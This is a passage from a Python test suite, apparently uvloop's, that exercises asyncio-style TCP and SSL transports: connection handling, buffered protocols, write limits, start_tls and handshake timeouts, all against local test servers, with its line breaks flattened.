def test_create_connection_6(self): if self.implementation == 'asyncio' and not self.PY37: raise unittest.SkipTest() with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful'): self.loop.run_until_complete( self.loop.create_connection( lambda: None, host='::', port=0, ssl_handshake_timeout=10)) def test_transport_shutdown(self): CNT = 0 # number of clients that were successful TOTAL_CNT = 100 # total number of clients that test will create TIMEOUT = 5.0 # timeout for this test async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(4) self.assertEqual(data, b'AAAA') writer.write(b'OK') writer.write_eof() writer.write_eof() await writer.drain() writer.close() CNT += 1 async def test_client(addr): reader, writer = await asyncio.open_connection( *addr, loop=self.loop) writer.write(b'AAAA') data = await reader.readexactly(2) self.assertEqual(data, b'OK') writer.close() async def start_server(): nonlocal CNT CNT = 0 srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop) srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) srv.close() await srv.wait_closed() self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) def test_tcp_handle_exception_in_connection_made(self): # Test that if connection_made raises an exception, # 'create_connection' still returns. # Silence error logging self.loop.set_exception_handler(lambda *args: None) fut = asyncio.Future(loop=self.loop) connection_lost_called = asyncio.Future(loop=self.loop) async def server(reader, writer): try: await reader.read() finally: writer.close() class Proto(asyncio.Protocol): def connection_made(self, tr): 1 / 0 def connection_lost(self, exc): connection_lost_called.set_result(exc) srv = self.loop.run_until_complete(asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop)) async def runner(): tr, pr = await asyncio.wait_for( self.loop.create_connection( Proto, *srv.sockets[0].getsockname()), timeout=1.0, loop=self.loop) fut.set_result(None) tr.close() self.loop.run_until_complete(runner()) srv.close() self.loop.run_until_complete(srv.wait_closed()) self.loop.run_until_complete(fut) self.assertIsNone( self.loop.run_until_complete(connection_lost_called)) class Test_UV_TCP(_TestTCP, tb.UVTestCase): def test_create_server_buffered_1(self): SIZE = 123123 eof = False done = False class Proto(asyncio.BaseProtocol): def connection_made(self, tr): self.tr = tr self.recvd = b'' self.data = bytearray(50) self.buf = memoryview(self.data) def get_buffer(self, sizehint): return self.buf def buffer_updated(self, nbytes): self.recvd += self.buf[:nbytes] if self.recvd == b'a' * SIZE: self.tr.write(b'hello') def eof_received(self): nonlocal eof eof = True def connection_lost(self, exc): nonlocal done done = exc async def test(): port = tb.find_free_port() srv = await self.loop.create_server(Proto, '127.0.0.1', port) s = socket.socket(socket.AF_INET) with s: s.setblocking(False) await self.loop.sock_connect(s, ('127.0.0.1', port)) await self.loop.sock_sendall(s, b'a' * SIZE) d = await self.loop.sock_recv(s, 100) self.assertEqual(d, b'hello') srv.close() await srv.wait_closed() self.loop.run_until_complete(test()) self.assertTrue(eof) self.assertIsNone(done) def test_create_server_buffered_2(self): class ProtoExc(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): 1 / 0 def buffer_updated(self, nbytes): pass def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass class ProtoZeroBuf1(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): return bytearray(0) def buffer_updated(self, nbytes): pass def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass class ProtoZeroBuf2(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): return memoryview(bytearray(0)) def buffer_updated(self, nbytes): pass def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass class ProtoUpdatedError(asyncio.BaseProtocol): def __init__(self): self._lost_exc = None def get_buffer(self, sizehint): return memoryview(bytearray(100)) def buffer_updated(self, nbytes): raise RuntimeError('oups') def connection_lost(self, exc): self._lost_exc = exc def eof_received(self): pass async def test(proto_factory, exc_type, exc_re): port = tb.find_free_port() proto = proto_factory() srv = await self.loop.create_server( lambda: proto, '127.0.0.1', port) try: s = socket.socket(socket.AF_INET) with s: s.setblocking(False) await self.loop.sock_connect(s, ('127.0.0.1', port)) await self.loop.sock_sendall(s, b'a') d = await self.loop.sock_recv(s, 100) if not d: raise ConnectionResetError except ConnectionResetError: pass else: self.fail("server didn't abort the connection") return finally: srv.close() await srv.wait_closed() if proto._lost_exc is None: self.fail("connection_lost() was not called") return with self.assertRaisesRegex(exc_type, exc_re): raise proto._lost_exc self.loop.set_exception_handler(lambda loop, ctx: None) self.loop.run_until_complete( test(ProtoExc, RuntimeError, 'unhandled error .* get_buffer')) self.loop.run_until_complete( test(ProtoZeroBuf1, RuntimeError, 'unhandled error .* get_buffer')) self.loop.run_until_complete( test(ProtoZeroBuf2, RuntimeError, 'unhandled error .* get_buffer')) self.loop.run_until_complete( test(ProtoUpdatedError, RuntimeError, r'^oups$')) def test_transport_get_extra_info(self): # This tests is only for uvloop. asyncio should pass it # too in Python 3.6. fut = asyncio.Future(loop=self.loop) async def handle_client(reader, writer): with self.assertRaises(asyncio.IncompleteReadError): await reader.readexactly(4) writer.close() # Previously, when we used socket.fromfd to create a socket # for UVTransports (to make get_extra_info() work), a duplicate # of the socket was created, preventing UVTransport from being # properly closed. # This test ensures that server handle will receive an EOF # and finish the request. fut.set_result(None) async def test_client(addr): t, p = await self.loop.create_connection( lambda: asyncio.Protocol(), *addr) if hasattr(t, 'get_protocol'): p2 = asyncio.Protocol() self.assertIs(t.get_protocol(), p) t.set_protocol(p2) self.assertIs(t.get_protocol(), p2) t.set_protocol(p) self.assertFalse(t._paused) self.assertTrue(t.is_reading()) t.pause_reading() t.pause_reading() # Check that it's OK to call it 2nd time. self.assertTrue(t._paused) self.assertFalse(t.is_reading()) t.resume_reading() t.resume_reading() # Check that it's OK to call it 2nd time. self.assertFalse(t._paused) self.assertTrue(t.is_reading()) sock = t.get_extra_info('socket') self.assertIs(sock, t.get_extra_info('socket')) sockname = sock.getsockname() peername = sock.getpeername() with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.add_writer(sock.fileno(), lambda: None) with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.remove_writer(sock.fileno()) with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.add_reader(sock.fileno(), lambda: None) with self.assertRaisesRegex(RuntimeError, 'is used by transport'): self.loop.remove_reader(sock.fileno()) self.assertEqual(t.get_extra_info('sockname'), sockname) self.assertEqual(t.get_extra_info('peername'), peername) t.write(b'OK') # We want server to fail. self.assertFalse(t._closing) t.abort() self.assertTrue(t._closing) self.assertFalse(t.is_reading()) # Check that pause_reading and resume_reading don't raise # errors if called after the transport is closed. t.pause_reading() t.resume_reading() await fut # Test that peername and sockname are available after # the transport is closed. self.assertEqual(t.get_extra_info('peername'), peername) self.assertEqual(t.get_extra_info('sockname'), sockname) async def start_server(): srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop) addr = srv.sockets[0].getsockname() await test_client(addr) srv.close() await srv.wait_closed() self.loop.run_until_complete(start_server()) def test_create_server_float_backlog(self): # asyncio spits out a warning we cannot suppress async def runner(bl): await self.loop.create_server( asyncio.Protocol, None, 0, backlog=bl) for bl in (1.1, '1'): with self.subTest(backlog=bl): with self.assertRaisesRegex(TypeError, 'integer'): self.loop.run_until_complete(runner(bl)) def test_many_small_writes(self): N = 10000 TOTAL = 0 fut = self.loop.create_future() async def server(reader, writer): nonlocal TOTAL while True: d = await reader.read(10000) if not d: break TOTAL += len(d) fut.set_result(True) writer.close() async def run(): srv = await asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop) addr = srv.sockets[0].getsockname() r, w = await asyncio.open_connection(*addr, loop=self.loop) DATA = b'x' * 102400 # Test _StreamWriteContext with short sequences of writes w.write(DATA) await w.drain() for _ in range(3): w.write(DATA) await w.drain() for _ in range(10): w.write(DATA) await w.drain() for _ in range(N): w.write(DATA) try: w.write('a') except TypeError: pass await w.drain() for _ in range(N): w.write(DATA) await w.drain() w.close() await fut srv.close() await srv.wait_closed() self.assertEqual(TOTAL, N * 2 * len(DATA) + 14 * len(DATA)) self.loop.run_until_complete(run()) def test_tcp_handle_unclosed_gc(self): fut = self.loop.create_future() async def server(reader, writer): writer.transport.abort() fut.set_result(True) async def run(): addr = srv.sockets[0].getsockname() await asyncio.open_connection(*addr, loop=self.loop) await fut srv.close() await srv.wait_closed() srv = self.loop.run_until_complete(asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop)) if self.loop.get_debug(): rx = r'unclosed resource <TCP.*; ' \ r'object created at(.|\n)*test_tcp_handle_unclosed_gc' else: rx = r'unclosed resource <TCP.*' with self.assertWarnsRegex(ResourceWarning, rx): self.loop.create_task(run()) self.loop.run_until_complete(srv.wait_closed()) self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop)) srv = None gc.collect() gc.collect() gc.collect() self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop)) # Since one TCPTransport handle wasn't closed correctly, # we need to disable this check: self.skip_unclosed_handles_check() def test_tcp_handle_abort_in_connection_made(self): async def server(reader, writer): try: await reader.read() finally: writer.close() class Proto(asyncio.Protocol): def connection_made(self, tr): tr.abort() srv = self.loop.run_until_complete(asyncio.start_server( server, '127.0.0.1', 0, family=socket.AF_INET, loop=self.loop)) async def runner(): tr, pr = await asyncio.wait_for( self.loop.create_connection( Proto, *srv.sockets[0].getsockname()), timeout=1.0, loop=self.loop) # Asyncio would return a closed socket, which we # can't do: the transport was aborted, hence there # is no FD to attach a socket to (to make # get_extra_info() work). self.assertIsNone(tr.get_extra_info('socket')) tr.close() self.loop.run_until_complete(runner()) srv.close() self.loop.run_until_complete(srv.wait_closed()) def test_connect_accepted_socket_ssl_args(self): if self.implementation == 'asyncio' and not self.PY37: raise unittest.SkipTest() with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful'): with socket.socket() as s: self.loop.run_until_complete( self.loop.connect_accepted_socket( (lambda: None), s, ssl_handshake_timeout=10.0)) def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None): loop = self.loop class MyProto(MyBaseProto): def connection_lost(self, exc): super().connection_lost(exc) loop.call_soon(loop.stop) def data_received(self, data): super().data_received(data) self.transport.write(expected_response) lsock = socket.socket(socket.AF_INET) lsock.bind(('127.0.0.1', 0)) lsock.listen(1) addr = lsock.getsockname() message = b'test data' response = None expected_response = b'roger' def client(): nonlocal response try: csock = socket.socket(socket.AF_INET) if client_ssl is not None: csock = client_ssl.wrap_socket(csock) csock.connect(addr) csock.sendall(message) response = csock.recv(99) csock.close() except Exception as exc: print( "Failure in client thread in test_connect_accepted_socket", exc) thread = threading.Thread(target=client, daemon=True) thread.start() conn, _ = lsock.accept() proto = MyProto(loop=loop) proto.loop = loop extras = {} if server_ssl and (self.implementation != 'asyncio' or self.PY37): extras = dict(ssl_handshake_timeout=10.0) f = loop.create_task( loop.connect_accepted_socket( (lambda: proto), conn, ssl=server_ssl, **extras)) loop.run_forever() conn.close() lsock.close() thread.join(1) self.assertFalse(thread.is_alive()) self.assertEqual(proto.state, 'CLOSED') self.assertEqual(proto.nbytes, len(message)) self.assertEqual(response, expected_response) tr, _ = f.result() if server_ssl: self.assertIn('SSL', tr.__class__.__name__) tr.close() # let it close self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop)) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets') def test_create_connection_wrong_sock(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) with sock: coro = self.loop.create_connection(MyBaseProto, sock=sock) with self.assertRaisesRegex(ValueError, 'A Stream Socket was expected'): self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets') def test_create_server_wrong_sock(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) with sock: coro = self.loop.create_server(MyBaseProto, sock=sock) with self.assertRaisesRegex(ValueError, 'A Stream Socket was expected'): self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'), 'no socket.SOCK_NONBLOCK (linux only)') def test_create_server_stream_bittype(self): sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK) with sock: coro = self.loop.create_server(lambda: None, sock=sock) srv = self.loop.run_until_complete(coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) def test_flowcontrol_mixin_set_write_limits(self): async def client(addr): paused = False class Protocol(asyncio.Protocol): def pause_writing(self): nonlocal paused paused = True def resume_writing(self): nonlocal paused paused = False t, p = await self.loop.create_connection(Protocol, *addr) t.write(b'q' * 512) self.assertEqual(t.get_write_buffer_size(), 512) t.set_write_buffer_limits(low=16385) self.assertFalse(paused) self.assertEqual(t.get_write_buffer_limits(), (16385, 65540)) with self.assertRaisesRegex(ValueError, 'high.*must be >= low'): t.set_write_buffer_limits(high=0, low=1) t.set_write_buffer_limits(high=1024, low=128) self.assertFalse(paused) self.assertEqual(t.get_write_buffer_limits(), (128, 1024)) t.set_write_buffer_limits(high=256, low=128) self.assertTrue(paused) self.assertEqual(t.get_write_buffer_limits(), (128, 256)) t.close() with self.tcp_server(lambda sock: sock.recv_all(1), max_clients=1, backlog=1) as srv: self.loop.run_until_complete(client(srv.addr)) class Test_AIO_TCP(_TestTCP, tb.AIOTestCase): pass class _TestSSL(tb.SSLTestCase): ONLYCERT = tb._cert_fullname(__file__, 'ssl_cert.pem') ONLYKEY = tb._cert_fullname(__file__, 'ssl_key.pem') PAYLOAD_SIZE = 1024 * 100 TIMEOUT = 60 def test_create_server_ssl_1(self): CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 10.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() clients = [] async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') data = await reader.readexactly(len(B_DATA)) self.assertEqual(data, B_DATA) writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')]) await writer.drain() writer.close() CNT += 1 async def test_client(addr): fut = asyncio.Future(loop=self.loop) def prog(sock): try: sock.starttls(client_sslctx) sock.connect(addr) sock.send(A_DATA) data = sock.recv_all(2) self.assertEqual(data, b'OK') sock.send(B_DATA) data = sock.recv_all(4) self.assertEqual(data, b'SPAM') sock.close() except Exception as ex: self.loop.call_soon_threadsafe(fut.set_exception, ex) else: self.loop.call_soon_threadsafe(fut.set_result, None) client = self.tcp_client(prog) client.start() clients.append(client) await fut async def start_server(): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, ssl=sslctx, loop=self.loop, **extras) try: srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) finally: self.loop.call_soon(srv.close) await srv.wait_closed() with self._silence_eof_received_warning(): self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) for client in clients: client.stop() def test_create_connection_ssl_1(self): if self.implementation == 'asyncio': # Don't crash on asyncio errors self.loop.set_exception_handler(None) CNT = 0 TOTAL_CNT = 25 A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() def server(sock): sock.starttls( sslctx, server_side=True) data = sock.recv_all(len(A_DATA)) self.assertEqual(data, A_DATA) sock.send(b'OK') data = sock.recv_all(len(B_DATA)) self.assertEqual(data, B_DATA) sock.send(b'SPAM') sock.close() async def client(addr): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, **extras) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() async def client_sock(addr): sock = socket.socket() sock.connect(addr) reader, writer = await asyncio.open_connection( sock=sock, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() sock.close() def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) with self._silence_eof_received_warning(): run(client) with self._silence_eof_received_warning(): run(client_sock) def test_create_connection_ssl_slow_handshake(self): if self.implementation == 'asyncio': raise unittest.SkipTest() client_sslctx = self._create_client_ssl_context() # silence error logger self.loop.set_exception_handler(lambda *args: None) def server(sock): try: sock.recv_all(1024 * 1024) except ConnectionAbortedError: pass finally: sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, ssl_handshake_timeout=1.0) with self.tcp_server(server, max_clients=1, backlog=1) as srv: with self.assertRaisesRegex( ConnectionAbortedError, r'SSL handshake.*is taking longer'): self.loop.run_until_complete(client(srv.addr)) def test_create_connection_ssl_failed_certificate(self): if self.implementation == 'asyncio': raise unittest.SkipTest() # silence error logger self.loop.set_exception_handler(lambda *args: None) sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context(disable_verify=False) def server(sock): try: sock.starttls( sslctx, server_side=True) sock.connect() except (ssl.SSLError, OSError): pass finally: sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, ssl_handshake_timeout=1.0) with self.tcp_server(server, max_clients=1, backlog=1) as srv: exc_type = ssl.SSLError if self.PY37: exc_type = ssl.SSLCertVerificationError with self.assertRaises(exc_type): self.loop.run_until_complete(client(srv.addr)) def test_start_tls_wrong_args(self): if self.implementation == 'asyncio': raise unittest.SkipTest() async def main(): with self.assertRaisesRegex(TypeError, 'SSLContext, got'): await self.loop.start_tls(None, None, None) sslctx = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) with self.assertRaisesRegex(TypeError, 'is not supported'): await self.loop.start_tls(None, None, sslctx) self.loop.run_until_complete(main()) def test_ssl_handshake_timeout(self): if self.implementation == 'asyncio': raise unittest.SkipTest() # bpo-29970: Check that a connection is aborted if handshake is not # completed in timeout period, instead of remaining open indefinitely client_sslctx = self._create_client_ssl_context() # silence error logger messages = [] self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx)) server_side_aborted = False def server(sock): nonlocal server_side_aborted try: sock.recv_all(1024 * 1024) except ConnectionAbortedError: server_side_aborted = True finally: sock.close() async def client(addr): await asyncio.wait_for( self.loop.create_connection( asyncio.Protocol, *addr, ssl=client_sslctx, server_hostname='', ssl_handshake_timeout=10.0), 0.5, loop=self.loop) with self.tcp_server(server, max_clients=1, backlog=1) as srv: with self.assertRaises(asyncio.TimeoutError): self.loop.run_until_complete(client(srv.addr)) self.assertTrue(server_side_aborted) # Python issue #23197: cancelling a handshake must not raise an # exception or log an error, even if the handshake failed self.assertEqual(messages, []) def test_ssl_connect_accepted_socket(self): server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) server_context.load_cert_chain(self.ONLYCERT, self.ONLYKEY) if hasattr(server_context, 'check_hostname'): server_context.check_hostname = False server_context.verify_mode = ssl.CERT_NONE client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) if hasattr(server_context, 'check_hostname'): client_context.check_hostname = False client_context.verify_mode = ssl.CERT_NONE Test_UV_TCP.test_connect_accepted_socket( self, server_context, client_context) def test_start_tls_client_corrupted_ssl(self): if self.implementation == 'asyncio': raise unittest.SkipTest() self.loop.set_exception_handler(lambda loop, ctx: None) sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() def server(sock): orig_sock = sock.dup() try: sock.starttls( sslctx, server_side=True) sock.sendall(b'A\n') sock.recv_all(1) orig_sock.send(b'please corrupt the SSL connection') except ssl.SSLError: pass finally: sock.close() orig_sock.close() async def client(addr): reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) self.assertEqual(await reader.readline(), b'A\n') writer.write(b'B') with self.assertRaises(ssl.SSLError): await reader.readline() writer.close() return 'OK' with self.tcp_server(server, max_clients=1, backlog=1) as srv: res = self.loop.run_until_complete(client(srv.addr)) self.assertEqual(res, 'OK') def test_start_tls_client_reg_proto_1(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() def serve(sock): sock.settimeout(self.TIMEOUT) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.starttls(server_context, server_side=True) sock.sendall(b'O') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.unwrap() sock.close() class ClientProto(asyncio.Protocol): def __init__(self, on_data, on_eof): self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(proto, tr): proto.con_made_cnt += 1 # Ensure connection_made gets called only once. self.assertEqual(proto.con_made_cnt, 1) def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProto(on_data, on_eof), *addr) tr.write(HELLO_MSG) new_tr = await self.loop.start_tls(tr, proto, client_context) self.assertEqual(await on_data, b'O') new_tr.write(HELLO_MSG) await on_eof new_tr.close() with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=10)) def test_create_connection_memory_leak(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() def serve(sock): sock.settimeout(self.TIMEOUT) sock.starttls(server_context, server_side=True) sock.sendall(b'O') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.unwrap() sock.close() class ClientProto(asyncio.Protocol): def __init__(self, on_data, on_eof): self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(proto, tr): # XXX: We assume user stores the transport in protocol proto.tr = tr proto.con_made_cnt += 1 # Ensure connection_made gets called only once. self.assertEqual(proto.con_made_cnt, 1) def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProto(on_data, on_eof), *addr, ssl=client_context) self.assertEqual(await on_data, b'O') tr.write(HELLO_MSG) await on_eof tr.close() with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=10)) # No garbage is left for SSL client from loop.create_connection, even # if user stores the SSLTransport in corresponding protocol instance client_context = weakref.ref(client_context) self.assertIsNone(client_context()) def test_start_tls_client_buf_proto_1(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() client_con_made_calls = 0 def serve(sock): sock.settimeout(self.TIMEOUT) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.starttls(server_context, server_side=True) sock.sendall(b'O') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.sendall(b'2') data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.unwrap() sock.close() class ClientProtoFirst(asyncio.BaseProtocol): def __init__(self, on_data): self.on_data = on_data self.buf = bytearray(1) def connection_made(self, tr): nonlocal client_con_made_calls client_con_made_calls += 1 def get_buffer(self, sizehint): return self.buf def buffer_updated(self, nsize): assert nsize == 1 self.on_data.set_result(bytes(self.buf[:nsize])) def eof_received(self): pass class ClientProtoSecond(asyncio.Protocol): def __init__(self, on_data, on_eof): self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(self, tr): nonlocal client_con_made_calls client_con_made_calls += 1 def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data1 = self.loop.create_future() on_data2 = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProtoFirst(on_data1), *addr) tr.write(HELLO_MSG) new_tr = await self.loop.start_tls(tr, proto, client_context) self.assertEqual(await on_data1, b'O') new_tr.write(HELLO_MSG) new_tr.set_protocol(ClientProtoSecond(on_data2, on_eof)) self.assertEqual(await on_data2, b'2') new_tr.write(HELLO_MSG) await on_eof new_tr.close() # connection_made() should be called only once -- when # we establish connection for the first time. Start TLS # doesn't call connection_made() on application protocols. self.assertEqual(client_con_made_calls, 1) with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=self.TIMEOUT)) def test_start_tls_slow_client_cancel(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE client_context = self._create_client_ssl_context() server_waits_on_handshake = self.loop.create_future() def serve(sock): sock.settimeout(self.TIMEOUT) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) try: self.loop.call_soon_threadsafe( server_waits_on_handshake.set_result, None) data = sock.recv_all(1024 * 1024) except ConnectionAbortedError: pass finally: sock.close() class ClientProto(asyncio.Protocol): def __init__(self, on_data, on_eof): self.on_data = on_data self.on_eof = on_eof self.con_made_cnt = 0 def connection_made(proto, tr): proto.con_made_cnt += 1 # Ensure connection_made gets called only once. self.assertEqual(proto.con_made_cnt, 1) def data_received(self, data): self.on_data.set_result(data) def eof_received(self): self.on_eof.set_result(True) async def client(addr): await asyncio.sleep(0.5, loop=self.loop) on_data = self.loop.create_future() on_eof = self.loop.create_future() tr, proto = await self.loop.create_connection( lambda: ClientProto(on_data, on_eof), *addr) tr.write(HELLO_MSG) await server_waits_on_handshake with self.assertRaises(asyncio.TimeoutError): await asyncio.wait_for( self.loop.start_tls(tr, proto, client_context), 0.5, loop=self.loop) with self.tcp_server(serve, timeout=self.TIMEOUT) as srv: self.loop.run_until_complete( asyncio.wait_for(client(srv.addr), loop=self.loop, timeout=10)) def test_start_tls_server_1(self): if self.implementation == 'asyncio': raise unittest.SkipTest() HELLO_MSG = b'1' * self.PAYLOAD_SIZE server_context = self._create_server_ssl_context( self.ONLYCERT, self.ONLYKEY) client_context = self._create_client_ssl_context() def client(sock, addr): sock.settimeout(self.TIMEOUT) sock.connect(addr) data = sock.recv_all(len(HELLO_MSG)) self.assertEqual(len(data), len(HELLO_MSG)) sock.starttls(client_context) sock.sendall(HELLO_MSG) sock.unwrap() sock.close() class ServerProto(asyncio.Protocol): def __init__(self, on_con, on_eof, on_con_lost): self.on_con = on_con self.on_eof = on_eof self.on_con_lost = on_con_lost self.data = b'' def connection_made(self, tr): self.on_con.set_result(tr) def data_received(self, data): self.data += data def eof_received(self): self.on_eof.set_result(1) def connection_lost(self, exc): if exc is None: self.on_con_lost.set_result(None) else: self.on_con_lost.set_exception(exc) async def main(proto, on_con, on_eof, on_con_lost): tr = await on_con tr.write(HELLO_MSG) self.assertEqual(proto.data, b'') new_tr = await self.loop.start_tls( tr, proto, server_context, server_side=True, ssl_handshake_timeout=self.TIMEOUT) await on_eof await on_con_lost self.assertEqual(proto.data, HELLO_MSG) new_tr.close() async def run_main(): on_con = self.loop.create_future() on_eof = self.loop.create_future() on_con_lost = self.loop.create_future() proto = ServerProto(on_con, on_eof, on_con_lost) server = await self.loop.create_server( lambda: proto, '127.0.0.1', 0) addr = server.sockets[0].getsockname() with self.tcp_client(lambda sock: client(sock, addr), timeout=self.TIMEOUT): await asyncio.wait_for( main(proto, on_con, on_eof, on_con_lost), loop=self.loop, timeout=self.TIMEOUT) server.close() await server.wait_closed() self.loop.run_until_complete(run_main()) def test_create_server_ssl_over_ssl(self): if self.implementation == 'asyncio': raise unittest.SkipTest('asyncio does not support SSL over SSL') CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 10.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx_1 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx_1 = self._create_client_ssl_context() sslctx_2 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) 